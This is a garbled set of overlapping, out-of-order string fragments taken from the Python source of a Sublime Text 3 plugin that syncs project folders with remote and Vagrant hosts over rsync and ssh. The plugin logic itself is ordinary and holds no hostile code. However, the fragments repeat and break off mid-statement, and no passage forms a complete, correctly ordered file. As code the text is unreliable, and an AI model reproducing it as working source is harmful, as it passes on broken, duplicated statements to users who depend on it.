"userSelection): if userSelection == -1: return False vm = vagrant_api.parse_vm_id(vms[userSelection]) if vm is",
"folder to remote folder:\", remotePath, done_with_folder, None, None) # ============================================================================= class FromRemote(sublime_plugin.TextCommand): \"\"\"Sync",
"parse the remote path you\" + \" entered\") return False elif len(more) ==",
"def add_remote_async(path, callback): print(\"Local path\", path) w = sublime.active_window() def done_with_folder(userInput): print(\"Remote path\",",
"return True do_it(userInput) return True def do_it(rsyncOptions): settings = {\"rsyncOptions\": rsyncOptions} sublime_api.update_project_settings(w, path,",
"sublime_api.update_project_settings(w, path, settings) if callback is not None: callback(settings) options = sync_api.default_rsync_options() found",
"len(parts) != 2: sublime_api.error_message(\"The remote path you entered does not\" + \" appear",
"or found[\"remotePath\"] == \"\": add_remote_async(path, lambda o: sync_api.rsync_remote( o.get(\"remotePath\", \"\"), path, o.get(\"remoteOptions\", \"\"),",
"edit, paths): sublime.set_timeout_async(lambda: rsync_options(paths[0], None), 0) def rsync_options(path, callback): print(\"Local path\", path) w",
"to a local project path.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: add_remote_async(paths[0], None), 0)",
"True return sync_api.rsync_remote(found.get(\"remotePath\", \"\"), found.get(\"path\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class",
"entered\") return False elif len(more) == 2: host = more[1] else: host =",
"implements the Sublime Text 3 commands provided by remote.\"\"\" import os import re",
"None, None) # ============================================================================= class FromRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory from a remote",
"does not\" + \" appear to contain a host\") return False more =",
"if userSelection == -1: return False vm = vagrant_api.parse_vm_id(vms[userSelection]) if vm is None:",
"sublime.active_window() found = sublime_api.project_by_path(w, filename) if found is None: return False return sync_api.rsync_remote_file(found.get(\"path\",",
"found[\"rsyncOptions\"] != \"\": options = found[\"rsyncOptions\"] sublime_api.show_input_panel(\"Use these rsync options:\", options, done_with_options, None,",
"RemoteEdit(sublime_plugin.EventListener): \"\"\"Sync a local change out.\"\"\" def on_post_save_async(self, view): filename = view.file_name() w",
"\"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class ToRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory to a",
"None, None) # ============================================================================= class AddRemoteCommand(sublime_plugin.TextCommand): \"\"\"Map a new remote path to a",
"def run(self, edit, paths): sublime.set_timeout_async(lambda: add_remote_async(paths[0], None), 0) def add_remote_async(path, callback): print(\"Local path\",",
"selected\", vm) sshOptions = vagrant_api.get_ssh_options(vm) print(\"ssh options\", sshOptions) if sshOptions != \"\": do_it(remotePath,",
"path\", path) w = sublime.active_window() found = sublime_api.project_by_path(w, path) if found is None",
"\"\"), o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"remotePath\", \"\"), found.get(\"path\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\",",
"\"\") return True parts = userInput.split(\":\") if len(parts) != 2: sublime_api.error_message(\"The remote path",
"re import sys import sublime import sublime_plugin import subprocess import threading sys.path.append(os.path.dirname(os.path.abspath(__file__))) import",
"done_with_folder, None, None) # ============================================================================= class FromRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory from a",
"============================================================================= class RemoteEdit(sublime_plugin.EventListener): \"\"\"Sync a local change out.\"\"\" def on_post_save_async(self, view): filename =",
"\"\"\"Sync a local change out.\"\"\" def on_post_save_async(self, view): filename = view.file_name() w =",
"on_post_save_async(self, view): filename = view.file_name() w = sublime.active_window() found = sublime_api.project_by_path(w, filename) if",
"= {\"remotePath\": remotePath, \"remoteOptions\": sshOptions} sublime_api.update_project_settings(w, path, settings) if callback is not None:",
"# ============================================================================= class FromRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory from a remote directory.\"\"\" def",
"from a remote directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: from_remote_async(paths[0]), 0) def from_remote_async(path):",
"= \"\" found = sublime_api.project_by_path(w, path) if found is not None and found[\"remotePath\"]",
"import remote.vagrant_api as vagrant_api # ============================================================================= class RsyncOptionsCommand(sublime_plugin.TextCommand): \"\"\"Override default rsync options for",
"Copyright (c) 2014 <NAME> # http://github.com/devaos/sublime-remote/blob/master/LICENSE \"\"\"This module implements the Sublime Text 3",
"run(self, edit, paths): sublime.set_timeout_async(lambda: from_remote_async(paths[0]), 0) def from_remote_async(path): print(\"From local path\", path) w",
"options = sync_api.default_rsync_options() found = sublime_api.project_by_path(w, path) if found is not None and",
"you entered does not\" + \" appear to contain a host\") return False",
"or found[\"remotePath\"] == \"\": add_remote_async(path, lambda o: sync_api.rsync_remote(path, o.get(\"remotePath\", \"\"), o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\",",
"to remote folder:\", remotePath, done_with_folder, None, None) # ============================================================================= class FromRemote(sublime_plugin.TextCommand): \"\"\"Sync a",
"view.file_name() w = sublime.active_window() found = sublime_api.project_by_path(w, filename) if found is None: return",
"# ============================================================================= class RsyncOptionsCommand(sublime_plugin.TextCommand): \"\"\"Override default rsync options for Remote.\"\"\" def run(self, edit,",
"provided by remote.\"\"\" import os import re import sys import sublime import sublime_plugin",
"found[\"rsyncOptions\"] sublime_api.show_input_panel(\"Use these rsync options:\", options, done_with_options, None, None) # ============================================================================= class AddRemoteCommand(sublime_plugin.TextCommand):",
"sync_api.rsync_remote( o.get(\"remotePath\", \"\"), path, o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"remotePath\", \"\"),",
"<reponame>devaos/sublime-remote<gh_stars>1-10 # -*- coding: utf-8 -*- # # Copyright (c) 2014 <NAME> #",
"2: host = more[1] else: host = more[0] if host == \"vagrant\": vms",
"as sync_api import remote.vagrant_api as vagrant_api # ============================================================================= class RsyncOptionsCommand(sublime_plugin.TextCommand): \"\"\"Override default rsync",
"is None: return False print(\"VM selected\", vm) sshOptions = vagrant_api.get_ssh_options(vm) print(\"ssh options\", sshOptions)",
"the Sublime Text 3 commands provided by remote.\"\"\" import os import re import",
"path) w = sublime.active_window() def done_with_folder(userInput): print(\"Remote path\", userInput) if len(userInput) == 0:",
"============================================================================= class ToRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory to a remote directory.\"\"\" def run(self,",
"len(userInput) == 0: do_it(sync_api.default_rsync_options()) return True do_it(userInput) return True def do_it(rsyncOptions): settings =",
"directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: to_remote_async(paths[0]), 0) def to_remote_async(path): print(\"To local path\",",
"local project path.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: add_remote_async(paths[0], None), 0) def add_remote_async(path,",
"more[1] else: host = more[0] if host == \"vagrant\": vms = [\"Select VM",
"found.get(\"path\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class ToRemote(sublime_plugin.TextCommand): \"\"\"Sync a local",
"\"\"), path, o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"remotePath\", \"\"), found.get(\"path\", \"\"),",
"a host\") return False more = parts[0].split(\"@\") host = \"\" if len(more) >",
"sublime_api.update_project_settings(w, path, settings) if callback is not None: callback(settings) remotePath = \"\" found",
"if len(more) > 2: sublime_api.error_message(\"Unable to parse the remote path you\" + \"",
"class AddRemoteCommand(sublime_plugin.TextCommand): \"\"\"Map a new remote path to a local project path.\"\"\" def",
"remote directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: from_remote_async(paths[0]), 0) def from_remote_async(path): print(\"From local",
"path you\" + \" entered\") return False elif len(more) == 2: host =",
"if host == \"vagrant\": vms = [\"Select VM below...\", \"---\"] vagrant_api.get_vm_list(vms) if len(vms)",
"\"\"), o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"path\", \"\"), found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\",",
"def run(self, edit, paths): sublime.set_timeout_async(lambda: to_remote_async(paths[0]), 0) def to_remote_async(path): print(\"To local path\", path)",
"path\", userInput) if len(userInput) == 0: do_it(\"\", \"\") return True parts = userInput.split(\":\")",
"found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class RemoteEdit(sublime_plugin.EventListener): \"\"\"Sync a local change out.\"\"\"",
"path) w = sublime.active_window() found = sublime_api.project_by_path(w, path) if found is None or",
"path) if found is None or found[\"remotePath\"] == \"\": add_remote_async(path, lambda o: sync_api.rsync_remote(path,",
"not\" + \" appear to contain a host\") return False more = parts[0].split(\"@\")",
"o.get(\"remotePath\", \"\"), path, o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"remotePath\", \"\"), found.get(\"path\",",
"callback is not None: callback(settings) remotePath = \"\" found = sublime_api.project_by_path(w, path) if",
"contain a host\") return False more = parts[0].split(\"@\") host = \"\" if len(more)",
"None), 0) def add_remote_async(path, callback): print(\"Local path\", path) w = sublime.active_window() def done_with_folder(userInput):",
"None: callback(settings) remotePath = \"\" found = sublime_api.project_by_path(w, path) if found is not",
"is None: return False return sync_api.rsync_remote_file(found.get(\"path\", \"\"), filename, found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\",",
"ToRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory to a remote directory.\"\"\" def run(self, edit, paths):",
"sublime_api.show_quick_panel(vms, lambda i=-1: done_with_vm(userInput, vms, i)) else: do_it(userInput, \"\") return True def done_with_vm(remotePath,",
"vms = [\"Select VM below...\", \"---\"] vagrant_api.get_vm_list(vms) if len(vms) == 2: sublime_api.error_message(\"No vagrant",
"= vagrant_api.get_ssh_options(vm) print(\"ssh options\", sshOptions) if sshOptions != \"\": do_it(remotePath, sshOptions) def do_it(remotePath,",
"False print(\"VM selected\", vm) sshOptions = vagrant_api.get_ssh_options(vm) print(\"ssh options\", sshOptions) if sshOptions !=",
"sublime.active_window() def done_with_options(userInput): print(\"Options\", userInput) if len(userInput) == 0: do_it(sync_api.default_rsync_options()) return True do_it(userInput)",
"len(vms) == 3: done_with_vm(userInput, vms, 2) else: sublime_api.show_quick_panel(vms, lambda i=-1: done_with_vm(userInput, vms, i))",
"more = parts[0].split(\"@\") host = \"\" if len(more) > 2: sublime_api.error_message(\"Unable to parse",
"0) def from_remote_async(path): print(\"From local path\", path) w = sublime.active_window() found = sublime_api.project_by_path(w,",
"i)) else: do_it(userInput, \"\") return True def done_with_vm(remotePath, vms, userSelection): if userSelection ==",
"== \"\": add_remote_async(path, lambda o: sync_api.rsync_remote(path, o.get(\"remotePath\", \"\"), o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return",
"sync_api import remote.vagrant_api as vagrant_api # ============================================================================= class RsyncOptionsCommand(sublime_plugin.TextCommand): \"\"\"Override default rsync options",
"a local change out.\"\"\" def on_post_save_async(self, view): filename = view.file_name() w = sublime.active_window()",
"userInput) if len(userInput) == 0: do_it(\"\", \"\") return True parts = userInput.split(\":\") if",
"print(\"Options\", userInput) if len(userInput) == 0: do_it(sync_api.default_rsync_options()) return True do_it(userInput) return True def",
"-1: return False vm = vagrant_api.parse_vm_id(vms[userSelection]) if vm is None: return False print(\"VM",
"edit, paths): sublime.set_timeout_async(lambda: add_remote_async(paths[0], None), 0) def add_remote_async(path, callback): print(\"Local path\", path) w",
"= sublime.active_window() def done_with_options(userInput): print(\"Options\", userInput) if len(userInput) == 0: do_it(sync_api.default_rsync_options()) return True",
"None) # ============================================================================= class AddRemoteCommand(sublime_plugin.TextCommand): \"\"\"Map a new remote path to a local",
"filename) if found is None: return False return sync_api.rsync_remote_file(found.get(\"path\", \"\"), filename, found.get(\"remotePath\", \"\"),",
"print(\"VM selected\", vm) sshOptions = vagrant_api.get_ssh_options(vm) print(\"ssh options\", sshOptions) if sshOptions != \"\":",
"done_with_vm(userInput, vms, i)) else: do_it(userInput, \"\") return True def done_with_vm(remotePath, vms, userSelection): if",
"print(\"Local path\", path) w = sublime.active_window() def done_with_folder(userInput): print(\"Remote path\", userInput) if len(userInput)",
"sublime_api.error_message(\"The remote path you entered does not\" + \" appear to contain a",
"\"\"), o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"path\", \"\"), found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\",",
"lambda o: sync_api.rsync_remote( o.get(\"remotePath\", \"\"), path, o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True return",
"o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"remotePath\", \"\"), found.get(\"path\", \"\"), found.get(\"remoteOptions\", \"\"),",
"sublime_api.project_by_path(w, filename) if found is None: return False return sync_api.rsync_remote_file(found.get(\"path\", \"\"), filename, found.get(\"remotePath\",",
"# ============================================================================= class ToRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory to a remote directory.\"\"\" def",
"if sshOptions != \"\": do_it(remotePath, sshOptions) def do_it(remotePath, sshOptions): settings = {\"remotePath\": remotePath,",
"== \"\": add_remote_async(path, lambda o: sync_api.rsync_remote( o.get(\"remotePath\", \"\"), path, o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\")))",
"as sublime_api import remote.sync_api as sync_api import remote.vagrant_api as vagrant_api # ============================================================================= class",
"a local project path.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: add_remote_async(paths[0], None), 0) def",
"if len(vms) == 3: done_with_vm(userInput, vms, 2) else: sublime_api.show_quick_panel(vms, lambda i=-1: done_with_vm(userInput, vms,",
"host = more[1] else: host = more[0] if host == \"vagrant\": vms =",
"\"vagrant\": vms = [\"Select VM below...\", \"---\"] vagrant_api.get_vm_list(vms) if len(vms) == 2: sublime_api.error_message(\"No",
"remote.vagrant_api as vagrant_api # ============================================================================= class RsyncOptionsCommand(sublime_plugin.TextCommand): \"\"\"Override default rsync options for Remote.\"\"\"",
"\"---\"] vagrant_api.get_vm_list(vms) if len(vms) == 2: sublime_api.error_message(\"No vagrant VMs found\") return False if",
"callback is not None: callback(settings) options = sync_api.default_rsync_options() found = sublime_api.project_by_path(w, path) if",
"True def done_with_vm(remotePath, vms, userSelection): if userSelection == -1: return False vm =",
"True parts = userInput.split(\":\") if len(parts) != 2: sublime_api.error_message(\"The remote path you entered",
"remote directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: to_remote_async(paths[0]), 0) def to_remote_async(path): print(\"To local",
"print(\"ssh options\", sshOptions) if sshOptions != \"\": do_it(remotePath, sshOptions) def do_it(remotePath, sshOptions): settings",
"\"\"\"Override default rsync options for Remote.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: rsync_options(paths[0], None),",
"found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class RemoteEdit(sublime_plugin.EventListener): \"\"\"Sync a local",
"not None and found[\"remotePath\"] != \"\": remotePath = found[\"remotePath\"] sublime_api.show_input_panel(\"Sync this folder to",
"None or found[\"remotePath\"] == \"\": add_remote_async(path, lambda o: sync_api.rsync_remote(path, o.get(\"remotePath\", \"\"), o.get(\"remoteOptions\", \"\"),",
"subprocess import threading sys.path.append(os.path.dirname(os.path.abspath(__file__))) import remote.sublime_api as sublime_api import remote.sync_api as sync_api import",
"{\"rsyncOptions\": rsyncOptions} sublime_api.update_project_settings(w, path, settings) if callback is not None: callback(settings) options =",
"\"\"))) return True return sync_api.rsync_remote(found.get(\"remotePath\", \"\"), found.get(\"path\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) #",
"o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"path\", \"\"), found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\"))",
"is None or found[\"remotePath\"] == \"\": add_remote_async(path, lambda o: sync_api.rsync_remote( o.get(\"remotePath\", \"\"), path,",
"\"\": remotePath = found[\"remotePath\"] sublime_api.show_input_panel(\"Sync this folder to remote folder:\", remotePath, done_with_folder, None,",
"class RsyncOptionsCommand(sublime_plugin.TextCommand): \"\"\"Override default rsync options for Remote.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda:",
"o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"path\", \"\"), found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\", \"\"),",
"sublime.active_window() def done_with_folder(userInput): print(\"Remote path\", userInput) if len(userInput) == 0: do_it(\"\", \"\") return",
"the remote path you\" + \" entered\") return False elif len(more) == 2:",
"== 2: sublime_api.error_message(\"No vagrant VMs found\") return False if len(vms) == 3: done_with_vm(userInput,",
"userSelection == -1: return False vm = vagrant_api.parse_vm_id(vms[userSelection]) if vm is None: return",
"options for Remote.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: rsync_options(paths[0], None), 0) def rsync_options(path,",
"def from_remote_async(path): print(\"From local path\", path) w = sublime.active_window() found = sublime_api.project_by_path(w, path)",
"done_with_options(userInput): print(\"Options\", userInput) if len(userInput) == 0: do_it(sync_api.default_rsync_options()) return True do_it(userInput) return True",
"vm) sshOptions = vagrant_api.get_ssh_options(vm) print(\"ssh options\", sshOptions) if sshOptions != \"\": do_it(remotePath, sshOptions)",
"is not None: callback(settings) options = sync_api.default_rsync_options() found = sublime_api.project_by_path(w, path) if found",
"this folder to remote folder:\", remotePath, done_with_folder, None, None) # ============================================================================= class FromRemote(sublime_plugin.TextCommand):",
"print(\"Remote path\", userInput) if len(userInput) == 0: do_it(\"\", \"\") return True parts =",
"sublime.set_timeout_async(lambda: to_remote_async(paths[0]), 0) def to_remote_async(path): print(\"To local path\", path) w = sublime.active_window() found",
"def on_post_save_async(self, view): filename = view.file_name() w = sublime.active_window() found = sublime_api.project_by_path(w, filename)",
"remotePath, \"remoteOptions\": sshOptions} sublime_api.update_project_settings(w, path, settings) if callback is not None: callback(settings) remotePath",
"import remote.sublime_api as sublime_api import remote.sync_api as sync_api import remote.vagrant_api as vagrant_api #",
"if vm is None: return False print(\"VM selected\", vm) sshOptions = vagrant_api.get_ssh_options(vm) print(\"ssh",
"if found is None: return False return sync_api.rsync_remote_file(found.get(\"path\", \"\"), filename, found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\",",
"not None and found[\"rsyncOptions\"] != \"\": options = found[\"rsyncOptions\"] sublime_api.show_input_panel(\"Use these rsync options:\",",
"is not None and found[\"remotePath\"] != \"\": remotePath = found[\"remotePath\"] sublime_api.show_input_panel(\"Sync this folder",
"path) if found is not None and found[\"rsyncOptions\"] != \"\": options = found[\"rsyncOptions\"]",
"2: sublime_api.error_message(\"The remote path you entered does not\" + \" appear to contain",
"vm is None: return False print(\"VM selected\", vm) sshOptions = vagrant_api.get_ssh_options(vm) print(\"ssh options\",",
"return True return sync_api.rsync_remote(found.get(\"path\", \"\"), found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # =============================================================================",
"options\", sshOptions) if sshOptions != \"\": do_it(remotePath, sshOptions) def do_it(remotePath, sshOptions): settings =",
"== 0: do_it(sync_api.default_rsync_options()) return True do_it(userInput) return True def do_it(rsyncOptions): settings = {\"rsyncOptions\":",
"= sublime_api.project_by_path(w, path) if found is not None and found[\"rsyncOptions\"] != \"\": options",
"== 2: host = more[1] else: host = more[0] if host == \"vagrant\":",
"def done_with_options(userInput): print(\"Options\", userInput) if len(userInput) == 0: do_it(sync_api.default_rsync_options()) return True do_it(userInput) return",
"default rsync options for Remote.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: rsync_options(paths[0], None), 0)",
"add_remote_async(path, lambda o: sync_api.rsync_remote(path, o.get(\"remotePath\", \"\"), o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True return",
"else: do_it(userInput, \"\") return True def done_with_vm(remotePath, vms, userSelection): if userSelection == -1:",
"vagrant_api.get_ssh_options(vm) print(\"ssh options\", sshOptions) if sshOptions != \"\": do_it(remotePath, sshOptions) def do_it(remotePath, sshOptions):",
"o.get(\"remotePath\", \"\"), o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"path\", \"\"), found.get(\"remotePath\", \"\"),",
"found[\"remotePath\"] == \"\": add_remote_async(path, lambda o: sync_api.rsync_remote( o.get(\"remotePath\", \"\"), path, o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\",",
"def do_it(remotePath, sshOptions): settings = {\"remotePath\": remotePath, \"remoteOptions\": sshOptions} sublime_api.update_project_settings(w, path, settings) if",
"None and found[\"remotePath\"] != \"\": remotePath = found[\"remotePath\"] sublime_api.show_input_panel(\"Sync this folder to remote",
"sublime_api.project_by_path(w, path) if found is None or found[\"remotePath\"] == \"\": add_remote_async(path, lambda o:",
"len(more) > 2: sublime_api.error_message(\"Unable to parse the remote path you\" + \" entered\")",
"edit, paths): sublime.set_timeout_async(lambda: to_remote_async(paths[0]), 0) def to_remote_async(path): print(\"To local path\", path) w =",
"= userInput.split(\":\") if len(parts) != 2: sublime_api.error_message(\"The remote path you entered does not\"",
"and found[\"rsyncOptions\"] != \"\": options = found[\"rsyncOptions\"] sublime_api.show_input_panel(\"Use these rsync options:\", options, done_with_options,",
"============================================================================= class FromRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory from a remote directory.\"\"\" def run(self,",
"import sys import sublime import sublime_plugin import subprocess import threading sys.path.append(os.path.dirname(os.path.abspath(__file__))) import remote.sublime_api",
"vagrant_api.parse_vm_id(vms[userSelection]) if vm is None: return False print(\"VM selected\", vm) sshOptions = vagrant_api.get_ssh_options(vm)",
"sys.path.append(os.path.dirname(os.path.abspath(__file__))) import remote.sublime_api as sublime_api import remote.sync_api as sync_api import remote.vagrant_api as vagrant_api",
"return sync_api.rsync_remote(found.get(\"remotePath\", \"\"), found.get(\"path\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class ToRemote(sublime_plugin.TextCommand):",
"remote path you entered does not\" + \" appear to contain a host\")",
"path, settings) if callback is not None: callback(settings) options = sync_api.default_rsync_options() found =",
"change out.\"\"\" def on_post_save_async(self, view): filename = view.file_name() w = sublime.active_window() found =",
"remotePath, done_with_folder, None, None) # ============================================================================= class FromRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory from",
"found\") return False if len(vms) == 3: done_with_vm(userInput, vms, 2) else: sublime_api.show_quick_panel(vms, lambda",
"vm = vagrant_api.parse_vm_id(vms[userSelection]) if vm is None: return False print(\"VM selected\", vm) sshOptions",
"\" appear to contain a host\") return False more = parts[0].split(\"@\") host =",
"host == \"vagrant\": vms = [\"Select VM below...\", \"---\"] vagrant_api.get_vm_list(vms) if len(vms) ==",
"!= \"\": remotePath = found[\"remotePath\"] sublime_api.show_input_panel(\"Sync this folder to remote folder:\", remotePath, done_with_folder,",
"add_remote_async(paths[0], None), 0) def add_remote_async(path, callback): print(\"Local path\", path) w = sublime.active_window() def",
"a local directory to a remote directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: to_remote_async(paths[0]),",
"callback): print(\"Local path\", path) w = sublime.active_window() def done_with_folder(userInput): print(\"Remote path\", userInput) if",
"found is None or found[\"remotePath\"] == \"\": add_remote_async(path, lambda o: sync_api.rsync_remote(path, o.get(\"remotePath\", \"\"),",
"vms, i)) else: do_it(userInput, \"\") return True def done_with_vm(remotePath, vms, userSelection): if userSelection",
"to a remote directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: to_remote_async(paths[0]), 0) def to_remote_async(path):",
"sublime.set_timeout_async(lambda: add_remote_async(paths[0], None), 0) def add_remote_async(path, callback): print(\"Local path\", path) w = sublime.active_window()",
"\"\")) # ============================================================================= class ToRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory to a remote directory.\"\"\"",
"print(\"Local path\", path) w = sublime.active_window() def done_with_options(userInput): print(\"Options\", userInput) if len(userInput) ==",
"\"\"), found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class RemoteEdit(sublime_plugin.EventListener): \"\"\"Sync a",
"remotePath = found[\"remotePath\"] sublime_api.show_input_panel(\"Sync this folder to remote folder:\", remotePath, done_with_folder, None, None)",
"from_remote_async(paths[0]), 0) def from_remote_async(path): print(\"From local path\", path) w = sublime.active_window() found =",
"# ============================================================================= class AddRemoteCommand(sublime_plugin.TextCommand): \"\"\"Map a new remote path to a local project",
"sshOptions) def do_it(remotePath, sshOptions): settings = {\"remotePath\": remotePath, \"remoteOptions\": sshOptions} sublime_api.update_project_settings(w, path, settings)",
"== 0: do_it(\"\", \"\") return True parts = userInput.split(\":\") if len(parts) != 2:",
"http://github.com/devaos/sublime-remote/blob/master/LICENSE \"\"\"This module implements the Sublime Text 3 commands provided by remote.\"\"\" import",
"path you entered does not\" + \" appear to contain a host\") return",
"view): filename = view.file_name() w = sublime.active_window() found = sublime_api.project_by_path(w, filename) if found",
"remotePath = \"\" found = sublime_api.project_by_path(w, path) if found is not None and",
"None: callback(settings) options = sync_api.default_rsync_options() found = sublime_api.project_by_path(w, path) if found is not",
"= [\"Select VM below...\", \"---\"] vagrant_api.get_vm_list(vms) if len(vms) == 2: sublime_api.error_message(\"No vagrant VMs",
"Sublime Text 3 commands provided by remote.\"\"\" import os import re import sys",
"directory from a remote directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: from_remote_async(paths[0]), 0) def",
"o: sync_api.rsync_remote( o.get(\"remotePath\", \"\"), path, o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"remotePath\",",
"edit, paths): sublime.set_timeout_async(lambda: from_remote_async(paths[0]), 0) def from_remote_async(path): print(\"From local path\", path) w =",
"found is not None and found[\"remotePath\"] != \"\": remotePath = found[\"remotePath\"] sublime_api.show_input_panel(\"Sync this",
"do_it(remotePath, sshOptions): settings = {\"remotePath\": remotePath, \"remoteOptions\": sshOptions} sublime_api.update_project_settings(w, path, settings) if callback",
"= found[\"rsyncOptions\"] sublime_api.show_input_panel(\"Use these rsync options:\", options, done_with_options, None, None) # ============================================================================= class",
"<NAME> # http://github.com/devaos/sublime-remote/blob/master/LICENSE \"\"\"This module implements the Sublime Text 3 commands provided by",
"+ \" entered\") return False elif len(more) == 2: host = more[1] else:",
"options:\", options, done_with_options, None, None) # ============================================================================= class AddRemoteCommand(sublime_plugin.TextCommand): \"\"\"Map a new remote",
"paths): sublime.set_timeout_async(lambda: rsync_options(paths[0], None), 0) def rsync_options(path, callback): print(\"Local path\", path) w =",
"\"\": do_it(remotePath, sshOptions) def do_it(remotePath, sshOptions): settings = {\"remotePath\": remotePath, \"remoteOptions\": sshOptions} sublime_api.update_project_settings(w,",
"False vm = vagrant_api.parse_vm_id(vms[userSelection]) if vm is None: return False print(\"VM selected\", vm)",
"is not None: callback(settings) remotePath = \"\" found = sublime_api.project_by_path(w, path) if found",
"0) def add_remote_async(path, callback): print(\"Local path\", path) w = sublime.active_window() def done_with_folder(userInput): print(\"Remote",
"elif len(more) == 2: host = more[1] else: host = more[0] if host",
"sublime_api.show_input_panel(\"Use these rsync options:\", options, done_with_options, None, None) # ============================================================================= class AddRemoteCommand(sublime_plugin.TextCommand): \"\"\"Map",
"remote.\"\"\" import os import re import sys import sublime import sublime_plugin import subprocess",
"if found is not None and found[\"remotePath\"] != \"\": remotePath = found[\"remotePath\"] sublime_api.show_input_panel(\"Sync",
"these rsync options:\", options, done_with_options, None, None) # ============================================================================= class AddRemoteCommand(sublime_plugin.TextCommand): \"\"\"Map a",
"run(self, edit, paths): sublime.set_timeout_async(lambda: to_remote_async(paths[0]), 0) def to_remote_async(path): print(\"To local path\", path) w",
"rsyncOptions} sublime_api.update_project_settings(w, path, settings) if callback is not None: callback(settings) options = sync_api.default_rsync_options()",
"FromRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory from a remote directory.\"\"\" def run(self, edit, paths):",
"!= 2: sublime_api.error_message(\"The remote path you entered does not\" + \" appear to",
"and found[\"remotePath\"] != \"\": remotePath = found[\"remotePath\"] sublime_api.show_input_panel(\"Sync this folder to remote folder:\",",
"if len(userInput) == 0: do_it(sync_api.default_rsync_options()) return True do_it(userInput) return True def do_it(rsyncOptions): settings",
"-*- # # Copyright (c) 2014 <NAME> # http://github.com/devaos/sublime-remote/blob/master/LICENSE \"\"\"This module implements the",
"2) else: sublime_api.show_quick_panel(vms, lambda i=-1: done_with_vm(userInput, vms, i)) else: do_it(userInput, \"\") return True",
"None or found[\"remotePath\"] == \"\": add_remote_async(path, lambda o: sync_api.rsync_remote( o.get(\"remotePath\", \"\"), path, o.get(\"remoteOptions\",",
"settings) if callback is not None: callback(settings) options = sync_api.default_rsync_options() found = sublime_api.project_by_path(w,",
"a local directory from a remote directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: from_remote_async(paths[0]),",
"-*- coding: utf-8 -*- # # Copyright (c) 2014 <NAME> # http://github.com/devaos/sublime-remote/blob/master/LICENSE \"\"\"This",
"if found is None or found[\"remotePath\"] == \"\": add_remote_async(path, lambda o: sync_api.rsync_remote( o.get(\"remotePath\",",
